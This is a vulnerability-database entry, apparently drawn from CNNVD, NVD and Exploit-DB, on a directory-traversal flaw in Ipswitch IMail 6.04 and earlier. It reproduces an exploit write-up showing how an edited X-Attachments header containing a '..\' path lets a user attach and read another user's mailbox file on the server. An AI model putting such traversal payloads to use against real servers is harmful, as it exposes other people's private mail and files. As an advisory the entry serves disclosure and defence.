发布时间 :2000-10-20 00:00:00
修订时间 :2016-10-17 22:07:29

[原文]The web server in IPSWITCH IMail 6.04 and earlier allows remote attackers to read and delete arbitrary files via a .. (dot dot) attack.

[CNNVD]IPSWITCH IMail web服务器漏洞(CNNVD-200010-093)

        IPSWITCH IMail 6.04及其早期版本的web服务器存在漏洞。远程攻击者可以借助..(点 点)攻击读取和删除任意文件。

- CVSS (基础分值)

CVSS分值: 6.4 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:ipswitch:imail:5.0Ipswitch IMail 5.0
cpe:/a:ipswitch:imail:6.2Ipswitch IMail 6.2
cpe:/a:ipswitch:imail:6.0Ipswitch IMail 6.0
cpe:/a:ipswitch:imail:6.3Ipswitch IMail 6.3
cpe:/a:ipswitch:imail:6.1Ipswitch IMail 6.1
cpe:/a:ipswitch:imail:6.4Ipswitch IMail 6.4

- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(UNKNOWN)  BUGTRAQ  20000830 Vulnerability Report On IPSWITCH's IMail

- 漏洞信息

IPSWITCH IMail web服务器漏洞
中危 未知
2000-10-20 00:00:00 2005-05-02 00:00:00
        IPSWITCH IMail 6.04及其早期版本的web服务器存在漏洞。远程攻击者可以借助..(点 点)攻击读取和删除任意文件。

- 公告与补丁


- 漏洞信息 (20182)

Ipswitch IMail 6.x File Attachment Vulnerability (EDBID:20182)
windows remote
2000-08-30 Verified
0 Timescape
N/A [点击下载]

IPSWITCH ships a product titled IMail, an email server for usage on NT servers serving clients their mail via a web interface. To this end the IMail server provides a web server typically running on port 8383 for it's end users to access. Via this interface users may read and send mail, as well as mail with file attachments. Certain versions of IMail do not perform proper access validation however resulting in users being able to attach files resident on the server. The net result of this is users may attach files on the server to which they should have no access. This access is limited to the user privileges which the server is being run as, typically SYSTEM.

It should be noted that once a user attachs the files in question the server deletes them.

Here is a sample mail header sent by IMAIL web services which
has an attachment. Please note that this is line wrapped for readability.

Date: Tue, 11 Jul 2000 13:10:28 +0200
Message-ID: <>
MIME-Version: 1.0 Content-Type: multipart/mixed; 
From: "Timescape" <>
Reply-To: <> 
To: <>
Subject: test
X-Mailer: <IMail v5.01> 
X-Attachments: D:\IMAIL\spool\gonzo2.jpg ;
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700 
Return-Path: <> 
X-OriginalArrivalTime: 11 Jul 2000 11:20:48.0256 (UTC) FILETIME=[10327800:01BFEB2A]

This is a multi-part message in MIME format.

Content-Type: text/plain;
Content-Transfer-Encoding: 7bit

Content-Type: application/octet-stream;
name="gonzo2.jpg "
Content-Transfer-Encoding: base64


The thing which we will be exploiting is the
X-Attachments: D:\IMAIL\spool\gonzo2.jpg ;

I made it work by modifing the compose message HTML file and
saved it locally. Then i can just arrange the path to the
attachment so that it can read

X-Attachments: D:\IMAIL\spool\..\bar\users\admin\main.mbx ;		

- 漏洞信息

Ipswitch IMail Unauthorized File Attachment
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity Patch / RCS
Exploit Public Third-party Verified

- 漏洞描述

The web server in IPSWITCH IMail 6.04 and earlier allows remote attackers to read and delete arbitrary files via a .. (dot dot) attack.

- 时间线

2000-08-30 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, the vendor has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete